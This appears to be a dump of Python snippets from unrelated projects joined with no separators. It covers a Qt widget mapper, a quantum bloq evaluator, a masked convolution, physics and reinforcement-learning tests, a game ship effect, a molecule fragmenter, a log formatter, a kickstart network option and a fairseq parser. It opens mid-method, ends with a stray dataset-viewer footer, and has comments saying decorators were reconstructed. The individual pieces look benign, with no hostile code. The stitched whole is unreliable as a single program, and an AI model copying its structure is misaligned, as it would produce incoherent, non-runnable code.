        grid = QGridLayout()
        placements = (
            (name_label, 0, 0, 1, 1),
            (name_edit, 0, 1, 1, 1),
            (self.previousButton, 0, 2, 1, 1),
            (address_label, 1, 0, 1, 1),
            (address_edit, 1, 1, 2, 1),
            (self.nextButton, 1, 2, 1, 1),
            (age_label, 3, 0, 1, 1),
            (age_spin_box, 3, 1, 1, 1),
        )
        for widget, row, col, row_span, col_span in placements:
            grid.addWidget(widget, row, col, row_span, col_span)
        self.setLayout(grid)

        self.setWindowTitle('Simple Widget Mapper')
        self.mapper.toFirst()

    def setupModel(self):
        """Fill self.model with five rows of name / address / age."""
        self.model = QStandardItemModel(5, 3, self)
        names = ('Alice', 'Bob', 'Carol', 'Donald', 'Emma')
        addresses = ('<qt>123 Main Street<br/>Market Town</qt>', '<qt>PO Box 32<br/>Mail Handling Service<br/>Service City</qt>', '<qt>The Lighthouse<br/>Remote Island</qt>', '<qt>47338 Park Avenue<br/>Big City</qt>', '<qt>Research Station<br/>Base Camp<br/>Big Mountain</qt>')
        ages = ('20', '31', '32', '19', '26')
        for row, record in enumerate(zip(names, addresses, ages)):
            for column, text in enumerate(record):
                self.model.setItem(row, column, QStandardItem(text))

    def updateButtons(self, row):
        """Enable Previous/Next only when a neighbouring row exists."""
        last_row = self.model.rowCount() - 1
        self.previousButton.setEnabled(row > 0)
        self.nextButton.setEnabled(row < last_row)
def _binst_on_classical_vals(binst: BloqInstance, pred_cxns: Iterable[Connection], soq_assign: Dict[(Soquet, ClassicalValT)]):
    """Propagate classical values into `binst`, evaluate it, and record its outputs.

    Mutates `soq_assign` in place: first copies each predecessor connection's
    value across, then assigns the bloq's classical outputs.
    """
    # Carry each predecessor's value across its connection into this instance.
    for cxn in pred_cxns:
        soq_assign[cxn.right] = soq_assign[cxn.left]

    bloq = binst.bloq
    # Gather input values keyed by register name, then evaluate classically.
    in_vals = {
        reg.name: _get_in_vals(binst, reg, soq_assign=soq_assign)
        for reg in bloq.signature.lefts()
    }
    out_vals = bloq.on_classical_vals(**in_vals)
    _update_assign_from_vals(bloq.signature.rights(), binst, out_vals, soq_assign)
def ensure_image_locations(*names):
    """Ensure an ImageStorageLocation row exists for each of the given names.

    Looks up which names are already present and bulk-inserts only the
    missing ones, all inside a single transaction.
    """
    with db_transaction():
        existing = ImageStorageLocation.select().where(ImageStorageLocation.name << names)
        # Set difference instead of the previous per-row list.remove() loop:
        # O(n) instead of O(n^2), and robust to duplicate input names.
        missing = set(names) - {location.name for location in existing}
        if not missing:
            return
        data = [{'name': name} for name in missing]
        ImageStorageLocation.insert_many(data).execute()
class MaskedConv2d(nn.Conv2d):
    """Conv2d variant that can apply a spatial mask via masked_conv2d."""

    def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
        super(MaskedConv2d, self).__init__(
            in_channels, out_channels, kernel_size,
            stride, padding, dilation, groups, bias)

    def forward(self, input, mask=None):
        # Guard clause: with no mask this is an ordinary convolution.
        if mask is None:
            return super(MaskedConv2d, self).forward(input)
        return masked_conv2d(input, mask, self.weight, self.bias, self.padding)
# NOTE(review): decorator restored from the decayed ".filterwarnings(...)"
# fragment left by extraction -- confirm against upstream qutip tests.
@pytest.mark.filterwarnings('ignore:The input coordinates to pcolor:UserWarning')
def test_anim_spin_distribution():
    """Smoke test: anim_spin_distribution returns a Figure and an ArtistAnimation."""
    j = 5
    # Random coherent spin state; the previous dead assignment of
    # qutip.spin_state(j, -j) (immediately overwritten) was removed.
    psi = qutip.spin_coherent(j, np.random.rand() * np.pi, np.random.rand() * 2 * np.pi)
    theta = np.linspace(0, np.pi, 50)
    phi = np.linspace(0, 2 * np.pi, 50)
    Q, THETA, PHI = qutip.spin_q_function(psi, theta, phi)
    # Two identical frames are enough to exercise the animation path.
    fig, ani = qutip.anim_spin_distribution([Q] * 2, THETA, PHI)
    plt.close()
    assert isinstance(fig, mpl.figure.Figure)
    assert isinstance(ani, mpl.animation.ArtistAnimation)
class Effect8048(BaseEffect):
    """EDENCOM Frigate hull bonus: damage multiplier for Small Vorton Projectors."""

    type = 'passive'

    def handler(fit, ship, context, projectionRange, **kwargs):
        # Boost damageMultiplier on every fitted module that requires the
        # Small Vorton Projector skill, scaled by the hull's shipBonusUF2.
        def _uses_small_vorton(mod):
            return mod.item.requiresSkill('Small Vorton Projector')

        fit.modules.filteredItemBoost(
            _uses_small_vorton,
            'damageMultiplier',
            ship.getModifiedItemAttr('shipBonusUF2'),
            skill='EDENCOM Frigate',
            **kwargs)
def cut(mol):
    """Fragment `mol` by breaking one random acyclic single bond.

    Returns:
        A tuple of fragment Mols with dummy atoms (label 1) marking the cut,
        or None if no suitable bond exists or sanitization fails.
    """
    # Acyclic single bond between any two atoms. Compile the SMARTS once and
    # match once (previously it was compiled twice and matched twice).
    pattern = Chem.MolFromSmarts('[*]-;![*]')
    matches = mol.GetSubstructMatches(pattern)
    if not matches:
        return None
    begin_idx, end_idx = random.choice(matches)
    bond_idx = mol.GetBondBetweenAtoms(begin_idx, end_idx).GetIdx()
    fragments_mol = Chem.FragmentOnBonds(mol, [bond_idx], addDummies=True, dummyLabels=[(1, 1)])
    try:
        return Chem.GetMolFrags(fragments_mol, asMols=True, sanitizeFrags=True)
    except ValueError:
        # Fragmentation produced an unsanitizable molecule.
        return None
def _nested_pack(flat_iter, structure):
    """Rebuild `structure`'s nesting, drawing leaf values from `flat_iter`.

    Mirrors a flatten operation: containers are recreated with the same type
    and shape, while every leaf position consumes the next flat value.
    """
    # Namedtuples must come first (they are tuples) and need *args construction.
    if is_namedtuple(structure):
        return type(structure)(*(_nested_pack(flat_iter, field) for field in structure))
    if isinstance(structure, dict):
        # Sorted keys give a deterministic order of consumption from flat_iter.
        return {key: _nested_pack(flat_iter, value) for key, value in sorted(structure.items())}
    if isinstance(structure, (list, tuple)):
        return type(structure)(_nested_pack(flat_iter, item) for item in structure)
    # Leaf: take the next flat value.
    return next(flat_iter)
class ColorFormatter(logging.Formatter):
    """Formatter that wraps the record's level name in ANSI SGR color codes.

    Codes: DEBUG 37 (white), INFO 36 (cyan), WARNING 33 (yellow),
    ERROR 31 (red), CRITICAL 41 (red background); unknown levels use 37.
    """

    color_dic = {'DEBUG': 37, 'INFO': 36, 'WARNING': 33, 'ERROR': 31, 'CRITICAL': 41}

    def format(self, record):
        """Format `record` with a colored level name, without mutating it.

        The previous version permanently overwrote ``record.levelname``, so
        other handlers saw the escape codes and a second format() call
        double-wrapped the name; restore the original value after formatting.
        """
        original_levelname = record.levelname
        color = self.color_dic.get(original_levelname, 37)
        record.levelname = '\x1b[{}m{}\x1b[0m'.format(color, original_levelname)
        try:
            return logging.Formatter.format(self, record)
        finally:
            record.levelname = original_levelname
class F27_Network(F25_Network):
    """Fedora 27 ``network`` kickstart command: adds the ``--bindto`` option."""

    removedKeywords = F25_Network.removedKeywords
    removedAttrs = F25_Network.removedAttrs

    def __init__(self, writePriority=0, *args, **kwargs):
        # Allowed --bindto values; currently only binding by MAC address.
        self.bind_to_choices = [BIND_TO_MAC]
        F25_Network.__init__(self, writePriority, *args, **kwargs)

    def _getParser(self):
        # Extend the F25 parser with the new --bindto option.
        op = F25_Network._getParser(self)
        op.add_argument('--bindto', dest='bindto', default=None, version=F27, choices=self.bind_to_choices, help='\n Optionally allows to specify how the connection\n configuration created for the device should be bound. If\n the option is not used, the connection binds to\n interface name (``DEVICE`` value in ifcfg file). For\n virtual devices (bond, team, bridge) it configures\n binding of slaves. Not applicable to vlan devices.\n\n Note that this option is independent of how the\n ``--device`` is specified.\n\n Currently only the value ``mac`` is suported.\n ``--bindto=mac`` will bind the connection to MAC address\n of the device (``HWADDR`` value in ifcfg file).\n\n For example::\n\n ``network --device=01:23:45:67:89:ab --bootproto=dhcp --bindto=mac``\n\n will bind the configuration of the device specified by\n MAC address ``01:23:45:67:89:ab`` to its MAC address.\n\n ``network --device=01:23:45:67:89:ab --bootproto=dhcp``\n\n will bind the configuration of the device specified by\n MAC address ``01:23:45:67:89:ab`` to its interface name\n (eg ``ens3``).\n\n ``network --device=ens3 --bootproto=dhcp --bindto=mac``\n\n will bind the configuration of the device specified by\n interface name ``ens3`` to its MAC address.\n ')
        return op

    def parse(self, args):
        """Parse the command line, rejecting --bindto=mac on vlan devices.

        Raises:
            KickstartParseError: if --bindto=mac is used with --vlanid but
                without bond options (binding by MAC is not applicable there).
        """
        retval = F25_Network.parse(self, args)
        if (retval.bindto == BIND_TO_MAC):
            if (retval.vlanid and (not retval.bondopts)):
                msg = (_('--bindto=%s is not supported for this type of device') % BIND_TO_MAC)
                raise KickstartParseError(msg, lineno=self.lineno)
        return retval
class TestAddStateIndependentNormalScale():
    """Tests for AddStateIndependentNormalScale."""

    def test_add_scale_basic(self, num_outputs=4):
        """A linear backbone's output gains a positive, shape-matched scale."""
        backbone = nn.Linear(3, num_outputs)
        scale_layer = AddStateIndependentNormalScale(num_outputs)
        loc, scale = scale_layer(backbone(torch.randn(3)))
        expected_shape = (num_outputs,)
        assert loc.shape == expected_shape
        assert scale.shape == expected_shape
        assert (scale > 0).all()

    def test_add_scale_sequence(self, num_outputs=4):
        """Extra LSTM outputs pass through; loc/scale keep sequence dims."""
        backbone = nn.LSTM(3, num_outputs)
        scale_layer = AddStateIndependentNormalScale(num_outputs)
        loc, scale, others = scale_layer(*backbone(torch.randn(4, 2, 3)))
        expected_shape = (4, 2, num_outputs)
        assert loc.shape == expected_shape
        assert scale.shape == expected_shape
        assert (scale > 0).all()
# NOTE(review): decorator restored from the decayed "(scope='session',
# autouse=True)" fragment left by extraction -- confirm against upstream.
@pytest.fixture(scope='session', autouse=True)
def clean_mask(zarr_dataset: ChunkedDataset) -> Iterator[None]:
    """Remove the dataset's agents_mask directory before and after the session."""
    def _remove_mask() -> None:
        # Delete the cached agents_mask folder next to the zarr dataset, if any.
        agents_mask_path = Path(zarr_dataset.path) / 'agents_mask'
        if agents_mask_path.exists():
            rmtree(str(agents_mask_path))

    _remove_mask()
    yield None
    _remove_mask()
def get_validation_parser(default_task=None):
    """Build the argparse parser used for validation runs.

    Combines the base parser with dataset arguments, single-worker
    distributed settings, and the common evaluation options.
    """
    parser = get_parser('Validation', default_task)
    add_dataset_args(parser, train=True)
    # Validation runs on a single worker by default.
    add_distributed_training_args(parser, default_world_size=1)
    eval_group = parser.add_argument_group('Evaluation')
    gen_parser_from_dataclass(eval_group, CommonEvalConfig())
    return parser
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.